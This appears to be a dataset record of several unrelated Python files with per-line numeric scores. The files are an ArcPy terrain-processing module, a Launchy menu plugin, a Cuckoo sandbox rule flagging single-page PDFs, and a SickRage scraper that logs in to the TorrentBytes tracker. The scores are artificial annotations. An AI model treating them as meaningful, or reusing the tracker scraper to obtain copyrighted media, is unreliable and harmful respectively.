[ 0.012345679012345678, 0.023809523809523808, 0.02, 0.2, 0.017857142857142856, 0.2, 0.013157894736842105, 0.013513513513513514, 0.0125, 0.023255813953488372, 0.2, 0.012987012987012988, 0.013333333333333334, 0.015151515151515152, 0.02040816326530612, 0.2, 0.014285714285714285, 0.021739130434782608, 0.020833333333333332, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0.012987012987012988, 0.018518518518518517, 0.012345679012345678, 0.06666666666666667, 0.07692307692307693, 0.2, 0, 0.2, 0.034482758620689655, 0.017543859649122806, 0, 0.08333333333333333, 0, 0.3333333333333333, 0.024691358024691357, 0.15384615384615385, 0.024691358024691357, 0.03125, 0.0425531914893617, 0, 0.3333333333333333, 0.03125, 0, 0, 0.047619047619047616, 0.3333333333333333, 0.03571428571428571, 0, 0.3333333333333333, 0.05, 0, 0.3333333333333333, 0.024691358024691357, 0.15384615384615385, 0.024691358024691357, 0.02857142857142857, 0, 0.2, 0, 0.041666666666666664, 0.2, 0, 0.3333333333333333, 0.02857142857142857, 0, 0, 0.045454545454545456, 0.3333333333333333, 0.030303030303030304, 0, 0.2, 0.043478260869565216, 0, 0.3333333333333333, 0.024691358024691357, 0.125, 0.024691358024691357, 0.037037037037037035, 0, 0.3333333333333333, 0.024691358024691357, 0.08695652173913043, 0.024691358024691357, 0.043478260869565216, 0, 0.2, 0, 0.03333333333333333, 0, 0.2, 0, 0.3333333333333333, 0.045454545454545456, 0, 0.2, 0, 0.01818181818181818, 0, 0.2, 0, 0.3333333333333333, 0.022222222222222223, 0.0392156862745098, 0.3333333333333333, 0.02127659574468085, 0.0392156862745098, 0.3333333333333333, 0.0136986301369863, 0.037037037037037035, 0.0136986301369863, 0.061224489795918366, 0.2, 0.047619047619047616, 0, 0.058823529411764705, 0.2, 0, 0.01694915254237288, 0, 0.1111111111111111, 0, 0, 0.05, 0.0625, 0.14285714285714285, 0.0125, 0.018518518518518517, 0.024390243902439025, 0, 0, 0.2, 0, 0.02197802197802198, 0.2, 0.012048192771084338, 0, 0, 0, 0.2, 0, 0, 0.08333333333333333, 0.3333333333333333, 0.07142857142857142, 0.07142857142857142, 0, 0.022727272727272728, 0.023255813953488372, 0.021739130434782608, 0.022727272727272728, 0.3333333333333333, 0.05555555555555555, 0.3333333333333333, 0.041666666666666664, 0.038461538461538464, 0.034482758620689655, 0.015625, 0.3333333333333333, 0.041666666666666664, 0.04, 0.03125, 0.017543859649122806, 0.034482758620689655, 0.015873015873015872, 0.3333333333333333, 0.09090909090909091, 0.3333333333333333, 0.041666666666666664, 0.2, 0, 0.2, 0.0425531914893617, 0, 0.2, 0, 0.058823529411764705, 0.04, 0.038461538461538464, 0.14285714285714285, 0.07142857142857142, 0.058823529411764705, 0.04, 0.038461538461538464, 0.2, 0, 0, 0.045454545454545456, 0, 0, 0.2, 0, 0.043478260869565216, 0.03333333333333333, 0.2, 0.02127659574468085, 0, 0.14285714285714285, 0.021739130434782608, 0, 0.3333333333333333, 0.037037037037037035, 0.1111111111111111, 0, 0.18181818181818182 ]
215
0.075501
false
##### Description of this python file ##### # This is the location for the DTM preparation module in the model. ##### VARIABLES - Used in this file##### # #---------------------------------------------------------------------# ##### START OF CODE ##### ### Import statements - Python ### import arcpy from arcpy.sa import * # Function to fill the DTM, calculate flow directions and cell size of the DTM. def DTM_preparation(DTM): # Calculate some stats for the DTM # Fill the raster DTM_fill = Fill(DTM) arcpy.AddMessage("Filled digital terrain model") arcpy.AddMessage("-----------------------") arcpy.SetProgressorPosition(5) # Calculate the flow direction of the DTM DTM_flow_direction = FlowDirection(DTM_fill) arcpy.AddMessage("Calculated flow direction") arcpy.AddMessage("-----------------------") # Get the cell size #Get the geoprocessing result object DTM_cell_size = arcpy.GetRasterProperties_management(DTM, "CELLSIZEX") #Get the elevation standard deviation value from geoprocessing result object cell_size = DTM_cell_size.getOutput(0) arcpy.AddMessage("Calculated cell size") arcpy.AddMessage("-----------------------") return DTM_fill, DTM_flow_direction, cell_size # Function to clip the DTM def DTM_clip(DTM_BNG, catch_extent, river_catchment_BNG): # Clip the DTM DTM_clip = arcpy.Clip_management(DTM_BNG, catch_extent, "MODEL_DTM", river_catchment_BNG, "#", "ClippingGeometry") #DTM_Clip1 = arcpy.gp.ExtractByMask_sa(DTM_Clip, river_catchment_BNG, "MODEL_DTM1") arcpy.AddMessage("Digital Terrain Model (DTM) clipped to catchment") arcpy.AddMessage("-------------------------") # Convert DTM to np array DTM_clip_np = arcpy.RasterToNumPyArray("MODEL_DTM", '#','#','#', -9999) # Find the characteristics of the DTM # Determine cell size desc_DTM = arcpy.Describe(DTM_clip) DTM_cell_size = desc_DTM.meanCellHeight arcpy.AddMessage("The model is working on a cell size of " + str(DTM_cell_size) + " metres.") DTM_extent = desc_DTM.Extent # Turns the corner into a point bottom_left_corner = arcpy.Point(DTM_extent.XMin, DTM_extent.YMin) return DTM_clip, DTM_cell_size, bottom_left_corner
[ "##### Description of this python file #####\n", "# This is the location for the DTM preparation module in the model.\n", "\n", "\n", "##### VARIABLES - Used in this file#####\n", "# \n", "\n", "#---------------------------------------------------------------------#\n", "##### START OF CODE #####\n", "### Import statements - Python ###\n", "import arcpy\n", "from arcpy.sa import *\n", "\n", "# Function to fill the DTM, calculate flow directions and cell size of the DTM.\n", "def DTM_preparation(DTM):\n", " # Calculate some stats for the DTM\n", " # Fill the raster\n", " DTM_fill = Fill(DTM)\n", " arcpy.AddMessage(\"Filled digital terrain model\")\n", " arcpy.AddMessage(\"-----------------------\")\n", " arcpy.SetProgressorPosition(5)\n", "\n", " # Calculate the flow direction of the DTM\n", " DTM_flow_direction = FlowDirection(DTM_fill)\n", " arcpy.AddMessage(\"Calculated flow direction\")\n", " arcpy.AddMessage(\"-----------------------\")\n", "\n", " # Get the cell size \n", " #Get the geoprocessing result object\n", " DTM_cell_size = arcpy.GetRasterProperties_management(DTM, \"CELLSIZEX\")\n", " #Get the elevation standard deviation value from geoprocessing result object\n", " cell_size = DTM_cell_size.getOutput(0) \n", " arcpy.AddMessage(\"Calculated cell size\")\n", " arcpy.AddMessage(\"-----------------------\")\n", "\n", " return DTM_fill, DTM_flow_direction, cell_size\n", "\n", "# Function to clip the DTM\n", "def DTM_clip(DTM_BNG, catch_extent, river_catchment_BNG):\n", " # Clip the DTM\n", " DTM_clip = arcpy.Clip_management(DTM_BNG, catch_extent, \"MODEL_DTM\", river_catchment_BNG, \"#\", \"ClippingGeometry\")\n", " #DTM_Clip1 = arcpy.gp.ExtractByMask_sa(DTM_Clip, river_catchment_BNG, \"MODEL_DTM1\")\n", " arcpy.AddMessage(\"Digital Terrain Model (DTM) clipped to catchment\")\n", " arcpy.AddMessage(\"-------------------------\")\n", "\n", " # Convert DTM to np array\n", " DTM_clip_np = arcpy.RasterToNumPyArray(\"MODEL_DTM\", '#','#','#', -9999)\n", "\n", " # Find the characteristics of the DTM\n", " # Determine cell size\n", " desc_DTM = arcpy.Describe(DTM_clip)\n", " DTM_cell_size = desc_DTM.meanCellHeight\n", " arcpy.AddMessage(\"The model is working on a cell size of \" + str(DTM_cell_size) + \" metres.\")\n", " DTM_extent = desc_DTM.Extent\n", "\n", " # Turns the corner into a point\n", " bottom_left_corner = arcpy.Point(DTM_extent.XMin, DTM_extent.YMin)\n", "\n", " return DTM_clip, DTM_cell_size, bottom_left_corner" ]
[ 0.022727272727272728, 0, 0, 0, 0.024390243902439025, 0.3333333333333333, 0, 0.013888888888888888, 0.038461538461538464, 0.02857142857142857, 0, 0, 0, 0, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.04, 0.024390243902439025, 0, 0.024691358024691357, 0.022727272727272728, 0, 0, 0, 0, 0, 0, 0.017241379310344827, 0, 0.008403361344537815, 0.022727272727272728, 0, 0, 0, 0, 0.02631578947368421, 0, 0, 0, 0, 0, 0.01020408163265306, 0, 0, 0, 0, 0, 0.018518518518518517 ]
59
0.01212
false
# Copyright (c) 2008 Shahar Kosti # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License as published by the Free Software # Foundation; either version 2 of the License, or (at your option) any later # version. # # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS # FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along with # this program; if not, write to the Free Software Foundation, Inc., # 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. #import rpdb2; rpdb2.start_embedded_debugger("password") import launchy import sys, os import subprocess from subprocess import Popen, PIPE class PyVerby(launchy.Plugin): def __init__(self): launchy.Plugin.__init__(self) self.icon = os.path.join(launchy.getIconsPath(), "pysimple.png") self.hash = launchy.hash(self.getName()) self.labelHash = launchy.hash("pyverby") def init(self): pass def getID(self): return self.hash def getName(self): return "PyVerby" def getIcon(self): return self.icon def getLabels(self, inputDataList): pass def getResults(self, inputDataList, resultsList): if len(inputDataList) < 1: return text = inputDataList[0].getText() isVerbyQuery = ( text[-4:-1] == " " ) print "%s##%s##%s" % (text, text[-4:-1], isVerbyQuery) if not isVerbyQuery: return text = text[:-4] isFileOrDir = os.path.isdir(text) or os.path.isfile(text) print "%s##%s" % (text, isFileOrDir) if not isFileOrDir: return runmenuApp = 'C:\\Program Files\\Launchy\\plugins\\python\\runmenu\\runmenu.exe' runmenu = Popen([runmenuApp, "/list", text], stdout=PIPE, startupinfo=self.__startupinfo) output = runmenu.stdout.read() splitted = output.split("\r\n") for command in splitted: if command == "": continue verbIdx = command.rfind("(Verb:") if verbIdx > -1: commandToExec = command[:verbIdx] else: commandToExec = command resultsList.append( launchy.CatItem(text, commandToExec, self.getID(), self.getIcon() )) def getCatalog(self, resultsList): pass def launchItem(self, inputDataList, catItemOrig): catItem = inputDataList[-1].getTopResult() print catItem.fullPath, catItem.shortName runmenuApp = 'C:\\Program Files\\Launchy\\plugins\\python\\runmenu\\runmenu.exe' runmenu = Popen([runmenuApp, '/exec:%s' % catItem.shortName, catItem.fullPath], stdout=PIPE, startupinfo=self.__startupinfo) print runmenu.stdout.read() def launchyShow(self): pass def launchyHide(self): pass __startupinfo = subprocess.STARTUPINFO() __startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW __startupinfo.wShowWindow = subprocess.SW_HIDE launchy.registerPlugin(PyVerby)
[ "# Copyright (c) 2008 Shahar Kosti\r\n", "#\r\n", "# This program is free software; you can redistribute it and/or modify it under\r\n", "# the terms of the GNU General Public License as published by the Free Software\r\n", "# Foundation; either version 2 of the License, or (at your option) any later\r\n", "# version.\r\n", "#\r\n", "# This program is distributed in the hope that it will be useful, but WITHOUT\r\n", "# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\r\n", "# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\r\n", "#\r\n", "# You should have received a copy of the GNU General Public License along with\r\n", "# this program; if not, write to the Free Software Foundation, Inc.,\r\n", "# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\r\n", "\r\n", "#import rpdb2; rpdb2.start_embedded_debugger(\"password\")\r\n", "import launchy\r\n", "import sys, os\r\n", "\r\n", "import subprocess\r\n", "from subprocess import Popen, PIPE\r\n", "\r\n", "class PyVerby(launchy.Plugin):\r\n", "\tdef __init__(self):\r\n", "\t\tlaunchy.Plugin.__init__(self)\r\n", "\t\tself.icon = os.path.join(launchy.getIconsPath(), \"pysimple.png\")\r\n", "\t\tself.hash = launchy.hash(self.getName())\r\n", "\t\tself.labelHash = launchy.hash(\"pyverby\")\r\n", "\r\n", "\tdef init(self):\r\n", "\t\tpass\r\n", "\t\t\r\n", "\tdef getID(self):\r\n", "\t\treturn self.hash\r\n", "\t\r\n", "\tdef getName(self):\r\n", "\t\treturn \"PyVerby\"\r\n", "\t\t\r\n", "\tdef getIcon(self):\r\n", "\t\treturn self.icon\r\n", "\t\t\r\n", "\tdef getLabels(self, inputDataList):\r\n", "\t\tpass\r\n", "\t\t\r\n", "\tdef getResults(self, inputDataList, resultsList):\r\n", "\t\tif len(inputDataList) < 1:\r\n", "\t\t\treturn\r\n", "\t\t\r\n", "\t\ttext = inputDataList[0].getText()\r\n", "\t\tisVerbyQuery = ( text[-4:-1] == \" \" )\r\n", "\t\tprint \"%s##%s##%s\" % (text, text[-4:-1], isVerbyQuery)\r\n", "\t\tif not isVerbyQuery:\r\n", "\t\t\treturn\r\n", "\t\t\r\n", "\t\ttext = text[:-4]\r\n", "\t\tisFileOrDir = os.path.isdir(text) or os.path.isfile(text)\r\n", "\t\tprint \"%s##%s\" % (text, isFileOrDir)\r\n", "\t\tif not isFileOrDir:\r\n", "\t\t\treturn\r\n", "\t\t\r\n", "\t\trunmenuApp = 'C:\\\\Program Files\\\\Launchy\\\\plugins\\\\python\\\\runmenu\\\\runmenu.exe'\r\n", "\t\trunmenu = Popen([runmenuApp, \"/list\", text], stdout=PIPE, startupinfo=self.__startupinfo)\r\n", "\t\toutput = runmenu.stdout.read()\r\n", "\t\t\r\n", "\t\tsplitted = output.split(\"\\r\\n\")\t\t\r\n", "\t\tfor command in splitted:\r\n", "\t\t\tif command == \"\":\r\n", "\t\t\t\tcontinue\r\n", "\t\t\t\t\r\n", "\t\t\tverbIdx = command.rfind(\"(Verb:\")\r\n", "\t\t\tif verbIdx > -1:\r\n", "\t\t\t\tcommandToExec = command[:verbIdx]\r\n", "\t\t\telse:\r\n", "\t\t\t\tcommandToExec = command\r\n", "\t\t\t\t\r\n", "\t\t\tresultsList.append( launchy.CatItem(text, commandToExec, self.getID(), self.getIcon() ))\r\n", "\t\t\r\n", "\tdef getCatalog(self, resultsList):\r\n", "\t\tpass\r\n", "\t\t\r\n", "\tdef launchItem(self, inputDataList, catItemOrig):\r\n", "\t\tcatItem = inputDataList[-1].getTopResult()\r\n", "\t\tprint catItem.fullPath, catItem.shortName\r\n", "\t\trunmenuApp = 'C:\\\\Program Files\\\\Launchy\\\\plugins\\\\python\\\\runmenu\\\\runmenu.exe'\r\n", "\t\trunmenu = Popen([runmenuApp, '/exec:%s' % catItem.shortName, catItem.fullPath], stdout=PIPE, startupinfo=self.__startupinfo)\r\n", "\t\t\r\n", "\t\tprint runmenu.stdout.read()\r\n", "\t\t\r\n", "\tdef launchyShow(self):\r\n", "\t\tpass\r\n", "\t\t\t\r\n", "\tdef launchyHide(self):\r\n", "\t\tpass\r\n", "\t\r\n", "\t__startupinfo = subprocess.STARTUPINFO()\r\n", "\t__startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW\r\n", "\t__startupinfo.wShowWindow = subprocess.SW_HIDE\r\n", "\r\n", "\r\n", "launchy.registerPlugin(PyVerby)\r\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0.017241379310344827, 0, 0.0625, 0, 0, 0, 0, 0.03125, 0.045454545454545456, 0.030303030303030304, 0.014705882352941176, 0.022727272727272728, 0.022727272727272728, 0, 0.05555555555555555, 0.125, 0.5, 0.05263157894736842, 0.05, 0.6666666666666666, 0.047619047619047616, 0.05, 0.5, 0.047619047619047616, 0.05, 0.5, 0.02631578947368421, 0.125, 0.5, 0.019230769230769232, 0.03333333333333333, 0.09090909090909091, 0.5, 0.02702702702702703, 0.06976744186046512, 0.017241379310344827, 0.041666666666666664, 0.09090909090909091, 0.5, 0.05, 0.01639344262295082, 0.025, 0.043478260869565216, 0.09090909090909091, 0.5, 0.023809523809523808, 0.021505376344086023, 0.029411764705882353, 0.5, 0.05405405405405406, 0.03571428571428571, 0.045454545454545456, 0.07142857142857142, 0.3333333333333333, 0.02631578947368421, 0.047619047619047616, 0.02564102564102564, 0.1, 0.034482758620689655, 0.3333333333333333, 0.043010752688172046, 0.5, 0.02702702702702703, 0.125, 0.5, 0.019230769230769232, 0.021739130434782608, 0.022222222222222223, 0.023809523809523808, 0.015625, 0.5, 0.03225806451612903, 0.5, 0.04, 0.125, 0.4, 0.04, 0.125, 0.6666666666666666, 0.023255813953488372, 0.01694915254237288, 0.02040816326530612, 0, 0, 0 ]
100
0.111407
false
# Copyright (C) 2012-2014 Cuckoo Foundation. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from lib.cuckoo.common.abstracts import Signature class PDF_Page(Signature): name = "pdf_page" description = "The PDF has one page. Many malicious PDFs only have one page." severity = 2 categories = ["pdf"] authors = ["KillerInstinct"] minimum = "1.3" filter_analysistypes = set(["file"]) def run(self): if "static" in self.results and "pdf" in self.results["static"]: if "PDF" in self.results["target"]["file"]["type"]: if "Keywords" in self.results["static"]["pdf"]: if "/Page" in self.results["static"]["pdf"]["Keywords"]: if self.results["static"]["pdf"]["Keywords"]["/Page"] == 1: return True return False
[ "# Copyright (C) 2012-2014 Cuckoo Foundation.\n", "#\n", "# This program is free software: you can redistribute it and/or modify\n", "# it under the terms of the GNU General Public License as published by\n", "# the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "#\n", "# This program is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "#\n", "# You should have received a copy of the GNU General Public License\n", "# along with this program. If not, see <http://www.gnu.org/licenses/>.\n", "\n", "from lib.cuckoo.common.abstracts import Signature\n", "\n", "class PDF_Page(Signature):\n", " name = \"pdf_page\"\n", " description = \"The PDF has one page. Many malicious PDFs only have one page.\"\n", " severity = 2\n", " categories = [\"pdf\"]\n", " authors = [\"KillerInstinct\"]\n", " minimum = \"1.3\"\n", "\n", " filter_analysistypes = set([\"file\"])\n", "\n", " def run(self):\n", " if \"static\" in self.results and \"pdf\" in self.results[\"static\"]:\n", " if \"PDF\" in self.results[\"target\"][\"file\"][\"type\"]:\n", " if \"Keywords\" in self.results[\"static\"][\"pdf\"]:\n", " if \"/Page\" in self.results[\"static\"][\"pdf\"][\"Keywords\"]:\n", " if self.results[\"static\"][\"pdf\"][\"Keywords\"][\"/Page\"] == 1:\n", " return True\n", "\n", " return False\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.037037037037037035, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0, 0 ]
36
0.001698
false
# Author: Idan Gutman # URL: http://code.google.com/p/sickbeard/ # # This file is part of SickRage. # # SickRage is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # SickRage is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with SickRage. If not, see <http://www.gnu.org/licenses/>. import re import urllib import traceback from sickbeard import logger from sickbeard import tvcache from sickbeard.providers import generic from sickbeard.bs4_parser import BS4Parser class TorrentBytesProvider(generic.TorrentProvider): def __init__(self): generic.TorrentProvider.__init__(self, "TorrentBytes") self.supportsBacklog = True self.username = None self.password = None self.ratio = None self.minseed = None self.minleech = None self.freeleech = False self.urls = {'base_url': 'https://www.torrentbytes.net', 'login': 'https://www.torrentbytes.net/takelogin.php', 'detail': 'https://www.torrentbytes.net/details.php?id=%s', 'search': 'https://www.torrentbytes.net/browse.php?search=%s%s', 'download': 'https://www.torrentbytes.net/download.php?id=%s&name=%s'} self.url = self.urls['base_url'] self.categories = "&c41=1&c33=1&c38=1&c32=1&c37=1" self.proper_strings = ['PROPER', 'REPACK'] self.cache = TorrentBytesCache(self) def isEnabled(self): return self.enabled def _doLogin(self): login_params = {'username': self.username, 'password': self.password, 'login': 'Log in!'} response = self.getURL(self.urls['login'], post_data=login_params, timeout=30) if not response: logger.log(u"Unable to connect to provider", logger.WARNING) return False if re.search('Username or password incorrect', response): logger.log(u"Invalid username or password. Check your settings", logger.WARNING) return False return True def _doSearch(self, search_params, search_mode='eponly', epcount=0, age=0, epObj=None): results = [] items = {'Season': [], 'Episode': [], 'RSS': []} if not self._doLogin(): return results for mode in search_params.keys(): logger.log(u"Search Mode: %s" % mode, logger.DEBUG) for search_string in search_params[mode]: if mode != 'RSS': logger.log(u"Search string: %s " % search_string, logger.DEBUG) searchURL = self.urls['search'] % (urllib.quote(search_string.encode('utf-8')), self.categories) logger.log(u"Search URL: %s" % searchURL, logger.DEBUG) data = self.getURL(searchURL) if not data: continue try: with BS4Parser(data, features=["html5lib", "permissive"]) as html: #Continue only if one Release is found empty = html.find('Nothing found!') if empty: logger.log(u"Data returned from provider does not contain any torrents", logger.DEBUG) continue torrent_table = html.find('table', attrs={'border': '1'}) torrent_rows = torrent_table.find_all('tr') if torrent_table else [] for result in torrent_rows[1:]: cells = result.find_all('td') size = None link = cells[1].find('a', attrs={'class': 'index'}) full_id = link['href'].replace('details.php?id=', '') torrent_id = full_id.split("&")[0] #Free leech torrents are marked with green [F L] in the title (i.e. <font color=green>[F&nbsp;L]</font>) freeleechTag = cells[1].find('font', attrs={'color': 'green'}) if freeleechTag and freeleechTag.text == u'[F\xa0L]': isFreeleechTorrent = True else: isFreeleechTorrent = False if self.freeleech and not isFreeleechTorrent: continue try: if link.has_key('title'): title = cells[1].find('a', {'class': 'index'})['title'] else: title = link.contents[0] download_url = self.urls['download'] % (torrent_id, link.contents[0]) seeders = int(cells[8].find('span').contents[0]) leechers = int(cells[9].find('span').contents[0]) # Need size for failed downloads handling if size is None: if re.match(r'[0-9]+,?\.?[0-9]*[KkMmGg]+[Bb]+', cells[6].text): size = self._convertSize(cells[6].text) if not size: size = -1 except (AttributeError, TypeError): continue if not all([title, download_url]): continue #Filter unseeded torrent if seeders < self.minseed or leechers < self.minleech: if mode != 'RSS': logger.log(u"Discarding torrent because it doesn't meet the minimum seeders or leechers: {0} (S:{1} L:{2})".format(title, seeders, leechers), logger.DEBUG) continue item = title, download_url, size, seeders, leechers if mode != 'RSS': logger.log(u"Found result: %s " % title, logger.DEBUG) items[mode].append(item) except Exception, e: logger.log(u"Failed parsing provider. Traceback: %s" % traceback.format_exc(), logger.ERROR) #For each search mode sort all the items by seeders if available items[mode].sort(key=lambda tup: tup[3], reverse=True) results += items[mode] return results def seedRatio(self): return self.ratio def _convertSize(self, sizeString): size = sizeString[:-2] modifier = sizeString[-2:] size = float(size) if modifier in 'KB': size = size * 1024 elif modifier in 'MB': size = size * 1024**2 elif modifier in 'GB': size = size * 1024**3 elif modifier in 'TB': size = size * 1024**4 return int(size) class TorrentBytesCache(tvcache.TVCache): def __init__(self, provider_obj): tvcache.TVCache.__init__(self, provider_obj) # only poll TorrentBytes every 20 minutes max self.minTime = 20 def _getRSSData(self): search_params = {'RSS': ['']} return {'entries': self.provider._doSearch(search_params)} provider = TorrentBytesProvider()
[ "# Author: Idan Gutman\n", "# URL: http://code.google.com/p/sickbeard/\n", "#\n", "# This file is part of SickRage.\n", "#\n", "# SickRage is free software: you can redistribute it and/or modify\n", "# it under the terms of the GNU General Public License as published by\n", "# the Free Software Foundation, either version 3 of the License, or\n", "# (at your option) any later version.\n", "#\n", "# SickRage is distributed in the hope that it will be useful,\n", "# but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "# GNU General Public License for more details.\n", "#\n", "# You should have received a copy of the GNU General Public License\n", "# along with SickRage. If not, see <http://www.gnu.org/licenses/>.\n", "\n", "import re\n", "import urllib\n", "import traceback\n", "\n", "from sickbeard import logger\n", "from sickbeard import tvcache\n", "from sickbeard.providers import generic\n", "from sickbeard.bs4_parser import BS4Parser\n", "\n", "\n", "class TorrentBytesProvider(generic.TorrentProvider):\n", "\n", " def __init__(self):\n", "\n", " generic.TorrentProvider.__init__(self, \"TorrentBytes\")\n", "\n", " self.supportsBacklog = True\n", "\n", " self.username = None\n", " self.password = None\n", " self.ratio = None\n", " self.minseed = None\n", " self.minleech = None\n", " self.freeleech = False\n", "\n", " self.urls = {'base_url': 'https://www.torrentbytes.net',\n", " 'login': 'https://www.torrentbytes.net/takelogin.php',\n", " 'detail': 'https://www.torrentbytes.net/details.php?id=%s',\n", " 'search': 'https://www.torrentbytes.net/browse.php?search=%s%s',\n", " 'download': 'https://www.torrentbytes.net/download.php?id=%s&name=%s'}\n", "\n", " self.url = self.urls['base_url']\n", "\n", " self.categories = \"&c41=1&c33=1&c38=1&c32=1&c37=1\"\n", "\n", " self.proper_strings = ['PROPER', 'REPACK']\n", "\n", " self.cache = TorrentBytesCache(self)\n", "\n", " def isEnabled(self):\n", " return self.enabled\n", "\n", " def _doLogin(self):\n", "\n", " login_params = {'username': self.username,\n", " 'password': self.password,\n", " 'login': 'Log in!'}\n", "\n", " response = self.getURL(self.urls['login'], post_data=login_params, timeout=30)\n", " if not response:\n", " logger.log(u\"Unable to connect to provider\", logger.WARNING)\n", " return False\n", "\n", " if re.search('Username or password incorrect', response):\n", " logger.log(u\"Invalid username or password. Check your settings\", logger.WARNING)\n", " return False\n", "\n", " return True\n", "\n", " def _doSearch(self, search_params, search_mode='eponly', epcount=0, age=0, epObj=None):\n", "\n", " results = []\n", " items = {'Season': [], 'Episode': [], 'RSS': []}\n", "\n", " if not self._doLogin():\n", " return results\n", "\n", " for mode in search_params.keys():\n", " logger.log(u\"Search Mode: %s\" % mode, logger.DEBUG)\n", " for search_string in search_params[mode]:\n", "\n", " if mode != 'RSS':\n", " logger.log(u\"Search string: %s \" % search_string, logger.DEBUG)\n", "\n", " searchURL = self.urls['search'] % (urllib.quote(search_string.encode('utf-8')), self.categories)\n", " logger.log(u\"Search URL: %s\" % searchURL, logger.DEBUG)\n", "\n", " data = self.getURL(searchURL)\n", " if not data:\n", " continue\n", "\n", " try:\n", " with BS4Parser(data, features=[\"html5lib\", \"permissive\"]) as html:\n", " #Continue only if one Release is found\n", " empty = html.find('Nothing found!')\n", " if empty:\n", " logger.log(u\"Data returned from provider does not contain any torrents\", logger.DEBUG)\n", " continue\n", "\n", " torrent_table = html.find('table', attrs={'border': '1'})\n", " torrent_rows = torrent_table.find_all('tr') if torrent_table else []\n", "\n", " for result in torrent_rows[1:]:\n", " cells = result.find_all('td')\n", " size = None\n", " link = cells[1].find('a', attrs={'class': 'index'})\n", "\n", " full_id = link['href'].replace('details.php?id=', '')\n", " torrent_id = full_id.split(\"&\")[0]\n", "\n", " #Free leech torrents are marked with green [F L] in the title (i.e. <font color=green>[F&nbsp;L]</font>)\n", " freeleechTag = cells[1].find('font', attrs={'color': 'green'})\n", " if freeleechTag and freeleechTag.text == u'[F\\xa0L]':\n", " isFreeleechTorrent = True\n", " else:\n", " isFreeleechTorrent = False\n", "\n", " if self.freeleech and not isFreeleechTorrent:\n", " continue\n", "\n", " try:\n", " if link.has_key('title'):\n", " title = cells[1].find('a', {'class': 'index'})['title']\n", " else:\n", " title = link.contents[0]\n", " download_url = self.urls['download'] % (torrent_id, link.contents[0])\n", " seeders = int(cells[8].find('span').contents[0])\n", " leechers = int(cells[9].find('span').contents[0]) \n", " \n", " # Need size for failed downloads handling\n", " if size is None:\n", " if re.match(r'[0-9]+,?\\.?[0-9]*[KkMmGg]+[Bb]+', cells[6].text):\n", " size = self._convertSize(cells[6].text)\n", " if not size:\n", " size = -1\n", " \n", " except (AttributeError, TypeError):\n", " continue\n", "\n", " if not all([title, download_url]):\n", " continue\n", "\n", " #Filter unseeded torrent\n", " if seeders < self.minseed or leechers < self.minleech:\n", " if mode != 'RSS':\n", " logger.log(u\"Discarding torrent because it doesn't meet the minimum seeders or leechers: {0} (S:{1} L:{2})\".format(title, seeders, leechers), logger.DEBUG)\n", " continue\n", "\n", " item = title, download_url, size, seeders, leechers\n", " if mode != 'RSS':\n", " logger.log(u\"Found result: %s \" % title, logger.DEBUG)\n", "\n", " items[mode].append(item)\n", "\n", " except Exception, e:\n", " logger.log(u\"Failed parsing provider. Traceback: %s\" % traceback.format_exc(), logger.ERROR)\n", "\n", " #For each search mode sort all the items by seeders if available\n", " items[mode].sort(key=lambda tup: tup[3], reverse=True)\n", "\n", " results += items[mode]\n", "\n", " return results\n", "\n", " def seedRatio(self):\n", " return self.ratio\n", " \n", " def _convertSize(self, sizeString):\n", " size = sizeString[:-2]\n", " modifier = sizeString[-2:]\n", " size = float(size)\n", " if modifier in 'KB':\n", " size = size * 1024\n", " elif modifier in 'MB':\n", " size = size * 1024**2\n", " elif modifier in 'GB':\n", " size = size * 1024**3\n", " elif modifier in 'TB':\n", " size = size * 1024**4\n", " return int(size)\n", "\n", "\n", "class TorrentBytesCache(tvcache.TVCache):\n", " def __init__(self, provider_obj):\n", "\n", " tvcache.TVCache.__init__(self, provider_obj)\n", "\n", " # only poll TorrentBytes every 20 minutes max\n", " self.minTime = 20\n", "\n", " def _getRSSData(self):\n", " search_params = {'RSS': ['']}\n", " return {'entries': self.provider._doSearch(search_params)}\n", "\n", "\n", "provider = TorrentBytesProvider()\n" ]
